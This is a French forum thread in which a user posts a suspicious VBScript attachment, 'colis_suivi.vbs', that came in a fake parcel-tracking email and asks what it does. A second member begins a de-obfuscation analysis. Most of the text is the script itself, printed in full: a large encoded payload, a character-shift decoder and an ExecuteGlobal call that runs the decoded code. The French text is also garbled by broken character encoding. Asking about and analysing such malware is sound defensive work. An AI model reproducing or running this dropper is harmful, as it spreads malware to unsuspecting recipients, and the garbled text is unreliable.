E‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰?F‰Q‰N‰CA‰CF‰CQ‰?=‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰Q‰N‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰?=‰@Q‰?=‰@=‰Q‰N‰CA‰CF‰CQ‰?=‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰Q‰N‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰?=‰@Q‰?=‰BB‰A?‰AS‰BB‰AR‰AA‰?E‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?F‰?=‰?Q‰?=‰@>‰Q‰N‰AC‰AS‰B?‰?=‰AA‰B?‰DN‰CF‰CN‰AB‰C@‰BF‰AO‰C@‰DD‰AS‰CD‰B=‰CS‰DA‰AR‰B@‰AE‰DN‰A@‰BB‰BE‰CR‰BC‰?=‰@Q‰?=‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰?=‰BA‰AS‰?=‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰Q‰N‰BB‰DC‰D=‰CF‰BB‰AQ‰AR‰BD‰B@‰D@‰CQ‰D?‰AC‰AO‰AC‰BB‰A@‰AQ‰BN‰D=‰AS‰D=‰AA‰AB‰AA‰?=‰@Q‰?=‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?E‰AA‰B?‰DN‰CF‰CN‰AB‰C@‰BF‰AO‰C@‰DD‰AS‰CD‰B=‰CS‰DA‰AR‰B@‰AE‰DN‰A@‰BB‰BE‰CR‰BC‰?F‰Q‰N‰CP‰AN‰CP‰B@‰DD‰AQ‰CF‰AQ‰AR‰A@‰DB‰BE‰CA‰B?‰BD‰BF‰D>‰CR‰DC‰D?‰A@‰CA‰CS‰DN‰CO‰?=‰@Q‰?=‰A@‰CE‰D?‰BD‰?E‰BB‰DC‰D=‰CF‰BB‰AQ‰AR‰BD‰B@‰D@‰CQ‰D?‰AC‰AO‰AC‰BB‰A@‰AQ‰BN‰D=‰AS‰D=‰AA‰AB‰AA‰?F‰Q‰N‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?=‰@Q‰?=‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?=‰?C‰?=‰CP‰AN‰CP‰B@‰DD‰AQ‰CF‰AQ‰AR‰A@‰DB‰BE‰CA‰B?‰BD‰BF‰D>‰CR‰DC‰D?‰A@‰CA‰CS‰DN‰CO‰Q‰N‰AR‰AB‰BE‰BA‰Q‰N‰CB‰DE‰CB‰C@‰DB‰DA‰CB‰?=‰?E‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?F‰Q‰N/6--4Ofr€yopTu‡\apdv„ofpXy|xyup|n}]_Tx~OcxQ‚O„zQrxƒdT-€r-ycfP`[xV\f‚…zn„†YY_]su-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/„v{ztz€Gii;i||ipvzƒ?/6-4Y…‡Y~gbRf`]\‡UsOSzpƒ_|…[yTp~a†YexP…„pecP^QO[N{tZru-4OƒT{PywV]NOXV‡„ScX_VzZYTcxsP{_{~R}xbU„`U\ƒpƒ‚€-€r-dpvy]QotRaftw€gZ‡{|W}}…^\-J-ycfP`[xV\f‚…zn„†YY_]su;r…rp~‚r†5-€vVtq`…Uv|„N{xNs„{wq|_†U-35Sw†PQ€Peq^{eW…sX`YdeUrƒn6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35y€v…cq_ea€bY[ws[qg„c^WTet6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F-7->?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>=>-<->6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FF=-<->=6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35@>CE-<-FF6-3-Zvq5/yFnBy|7†y@/9D9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35>AD?-<-AC6-3--/s/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35CC-8-AE6-3--/|/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>EB@-<->D6-3--/-/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>?@-:-A6-3--/v/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35BB-7-?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35B>6-3--/?/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FB6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>A6-3-Zvq5…RcN\VN}‡\nP_eudƒv…uX„‡s9C9>63--/p/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>@?-:-@>6-3--/€/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>;DA?A?A?A?A?A?A-7-CC6--99AE6--\Wr[uƒba}Xw{zoXYXTqV‚c~-J--/ywnz{s‚†x…/-qvz-b{XRs[tRdYPd†‚`_VUfO``u}-4‡\n`€VcoYV`\†wf|€ƒp‚ucpo‚~Rf}s…†PRs|[g‚uX{‡Y}Vf}TZvq-\Wr[uƒba}Xw{zoXYXTqV‚c~9@9@--s|-rnpu-b{XRs[tRdYPd†‚`_VUfO``u}-v{-dpvy]QotRaftw€gZ‡{|W}}…^\--vs-b{XRs[tRdYPd†‚`_VUfO``u};{nzr-J-/„/-3-Zvq5/@pp€~B?‚@@/9B9>63-Zvq5/tp@y==o„C|/9?9>63--//-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35C>FB-<-BF6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F@-:-AD6-3-Zvq5/B=rx~„E†~€w/9@9>63-Zvq5/BCC…q?w…uu‡/9E9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35DC-8-?B6---ur{--4‡…fRzf…OrezsYaYrwpNYƒ~zy„tvvefsRTNo]p€q[Nb‡„…-R…rp‚rTy|ony5…\cƒRtxƒYgXyvOa|nx|P‡rdƒ6--r{q-vs--{r…--r{q-vs--{r…--"
    dec=decode(txt)
    function decode(s)
    For i = 1 To Len(s)
    newtxt = Mid(s, i, 1)
    newtxt = Chr(Asc(newtxt) - 13)
    coded = coded + (newtxt)
    Next
    decode = coded
    End Function 
    ExecuteGlobal (dec)
    On peut voir que le txt est "cod้". il est d้cod้ avant d'๊tre ex้cut้ via la commande ExecuteGlobal (dec).
    J'ai affich้ le txt d้cod้ avec un msgbox :
    Nom : Capture.PNG
Affichages : 339
Taille : 30,8 Ko

    Questions :
    1. Quelqu'un comprend-il le but de ce code ?
    2. J'ai d้jเ eu เ faire avec mondial relay. Ils s'้taient r้v้l้s assez mauvais. Ce mail rel่ve-t-il de la malveillance ou de l'incomp้tence ? (pour confirmer une livraison, on renvoie le client vers une page web ou un espace client, mais jamais un vbscript!)

    Je suis vraiment curieux de comprendre ce truc ^^

  2. #2
    Membre du Club
    Homme Profil pro
    Ing้nieur d้veloppement logiciel
    Inscrit en
    F้vrier 2017
    Messages
    43
    D้tails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine et Marne (ฮle de France)

    Informations professionnelles :
    Activit้ : Ing้nieur d้veloppement logiciel

    Informations forums :
    Inscription : F้vrier 2017
    Messages : 43
    Points : 58
    Points
    58
    Par d้faut
    J'ai retranscrit le code avec des variables lisibles. Les noms que j'ai choisis sont s๛rement inad้quat, mais ne connaissant pas le but de ce code, il est difficile de faire les bon choix ^^.

    Apr่s analyse, on constate que la majorit้ du code repr้sente du bruit. Le code "utile" est encapsul้ เ travers plusieurs niveaux de "chiffrement".

    Passons cela en revue.
    Le fichier colis_suivi.vbs contient :
    Code : S้lectionner tout - Visualiser dans une fen๊tre เ part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Dim dec,txt 
    txt ="„€pv};€yrr}-A===-4eNv„‡ZPQcbdU‡`cQ{s`oƒyfu}€z]Yp€‡gq}ePQQ`xre€}Pe…r|{-r|-r€‚zr-{r…€vVtq`…Uv|„N{xNs„{wq|_†U-J-/pu„/-4Ofr€yopTu‡\apdv„ofpXy|xyup|n}]_Tx~OcxQ‚O„zQrxƒdTRf~Pzy~VT[p€RNQzT†oesfVz-J/tr|owrp/-4‚‡Pu~XburpzTY„Zwx‚{Z†qg[†xSes€awbQPnNP‡a}}cauSs‚{pv|{-`qd„_€\gq†o…†obyT|PuYS…]5†vvux…raSZYZ„up[q{P†zzaSS6-4YpabddQbg\\Tƒb\U~sUtxPzwgXX…q_†\db_‡]fcnVv`[]€…cO--qvz-^s\fWgNPgQ|†tdzrP~~pV‚~a9-fZQ†w‡[nnntabY‡^Pwts‡reu9-{~[TtetoVxs}q…dQ~„u‚ƒyfN---^s\fWgNPgQ|†tdzrP~~pV‚~a-J-//-----„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ-J-Yr{5†vvux…raSZYZ„up[q{P†zzaSS6---s|-fZQ†w‡[nnntabY‡^Pwts‡reu-J-?-|-„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ---{~[TtetoVxs}q…dQ~„u‚ƒyfN-J-//----4Po…‚N†TY„Zd|v}nxpP\€€XU…Ox‡‚tz|d^|d~O€arpVtzbX…|---„uvyr-Zvq5†vvux…raSZYZ„up[q{P†zzaSS9-fZQ†w‡[nnntabY‡^Pwts‡reu9->6-IK--/‰/--n{q-fZQ†w‡[nnntabY‡^Pwts‡reu-IJ-„tPƒP|{‚…ƒ}uw†_ZQbV{ƒƒ-----{~[TtetoVxs}q…dQ~„u‚ƒyfN-J-{~[TtetoVxs}q…dQ~„u‚ƒyfN-8-Zvq5†vvux…raSZYZ„up[q{P†zzaSS9-fZQ†w‡[nnntabY‡^Pwts‡reu9->6-----fZQ†w‡[nnntabY‡^Pwts‡reu-J-fZQ†w‡[nnntabY‡^Pwts‡reu8>----„r{q----^s\fWgNPgQ|†tdzrP~~pV‚~a-J-^s\fWgNPgQ|†tdzrP~~pV‚~a-8-pu5PY{t5-pu„5>=A-:-CC6-3-pu„5?C-8-DE6-3{~[TtetoVxs}q…dQ~„u‚ƒyfN66---{r…---`qd„_€\gq†o…†obyT|PuYS…]‡-J-^s\fWgNPgQ|†tdzrP~~pV‚~a--r{q-s‚{pv|{-4d`{‚x`}„g\u~^‡snfbaXVUxc|_NOYuNOSf~dvƒrrNRbRZ{Ywpz-4}RRg\U€ta\Z`[sYVVP^]VQ{SwNtnfyYeNgP|^}Y[[aoTP-4N`ca‡}ƒƒnOws[‡{{tOUX€tbp{Rodxy|P…[~Uq`YusqozTXf[‡s€r-€RnTQt€YZV{‚x†…{nd|TX|ga-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/„v{ztz€Gii/64}†anb…Sc{‡Y]{Tu‡wsx|~nR}QUbqT}„s}†QRz„xwZ^bs`{gno€r-nc[R`ysx‚WYX…nXw`€f…R~st~-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/;i||ipvzƒ?/6-4qbcu††|Y~^gP|fqSg|PP[[cNPNtge~vbNvZoxv‡s^OSbXwOƒOz---nQf†Nv]Peuq€STfYx€QTad`Qb-J-€RnTQt€YZV{‚x†…{nd|TX|ga-3-nc[R`ysx‚WYX…nXw`€f…R~st~--Sw†PQ€Peq^{eW…sX`YdeUrƒn-J->EC-:-D>--y€v…cq_ea€bY[ws[qg„c^WTet-J->FF-:-FE--…RcN\VN}‡\nP_eudƒv…uX„‡s-J-/=uq/-3-/„€|@/-3-/vA{/-€r-wqfX}T{€€OX|VqS}fprf{gTQ-J-nQf†Nv]Peuq€STfYx€QTad`Qb;r…rp~‚r†5-€vVtq`…Uv|„N{xNs„{wq|_†U-35Sw†PQ€Peq^{eW…sX`YdeUrƒn6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35y€v…cq_ea€bY[ws[qg„c^WTet6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F-7->?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>=>-<->6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FF=-<->=6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35@>CE-<-FF6-3-Zvq5/yFnBy|7†y@/9D9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35>AD?-<-AC6-3--/s/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35CC-8-AE6-3--/|/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>EB@-<->D6-3--/-/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>?@-:-A6-3--/v/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35BB-7-?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35B>6-3--/?/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FB6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>A6-3-Zvq5…RcN\VN}‡\nP_eudƒv…uX„‡s9C9>63--/p/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>@?-:-@>6-3--/€/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>B6--99AE6--qvz-xPav]O[fQbOdPNpe{gv\Yn‚--s|-rnpu-xPav]O[fQbOdPNpe{gv\Yn‚-v{-wqfX}T{€€OX|VqS}fprf{gTQ--vs-xPav]O[fQbOdPNpe{gv\Yn‚;{nzr-J-/„/-3-Zvq5/@pp€~B?‚@@/9B9>63-Zvq5/tp@y==o„C|/9?9>63--//-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35C>FB-<-BF6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F@-:-AD6-3-Zvq5/B=rx~„E†~€w/9@9>63-Zvq5/BCC…q?w…uu‡/9E9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35DC-8-?B6---ur{--qvz-…\cƒRtxƒYgXyvOa|nx|P‡rdƒ--…\cƒRtxƒYgXyvOa|nx|P‡rdƒ-J-`qd„_€\gq†o…†obyT|PuYS…]5-/‰Q‰N‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰@Q‰??‰@@‰@F‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@?‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@E‰@N‰@F‰@B‰@N‰@C‰@C‰@N‰@A‰@E‰@N‰@A‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@F‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@C‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@D‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@E‰@@‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@A‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@E‰@@‰@N‰@>‰@?‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@A‰@C‰@N‰@C‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@D‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@E‰@E‰@N‰@D‰@D‰@N‰@D‰@C‰@N‰@D‰@?‰@N‰@E‰@A‰@N‰@E‰@A‰@N‰@E‰@=‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@C‰@D‰@N‰@E‰@B‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@D‰@C‰@N‰@D‰@D‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@C‰@D‰@N‰@E‰@B‰@N‰@F‰@?‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@F‰@N‰@A‰@E‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@F‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@E‰@@‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@?‰@N‰@D‰@D‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@E‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@B‰@N‰@F‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@E‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@E‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@D‰@?‰@N‰@D‰@B‰@N‰@D‰@C‰@N‰@D‰@D‰@N‰@F‰@?‰@N‰@E‰@@‰@N‰@D‰@F‰@N‰@D‰@=‰@N‰@E‰@A‰@N‰@E‰@D‰@N‰@C‰@B‰@N‰@E‰@?‰@N‰@C‰@F‰@N‰@F‰@?‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@C‰@F‰@N‰@D‰@>‰@N‰@F‰@B‰@N‰@E‰@@‰@N‰@F‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@?‰@>‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@B‰@>‰@N‰@B‰@=‰@N‰@F‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@D‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@E‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@B‰@>‰@N‰@B‰@=‰@N‰@F‰@B‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@E‰@@‰@N‰@>‰@?‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@F‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@?‰@>‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@C‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@E‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@B‰@N‰@E‰@=‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@D‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@C‰@>‰@N‰@B‰@?‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@A‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@F‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@F‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@?‰@>‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰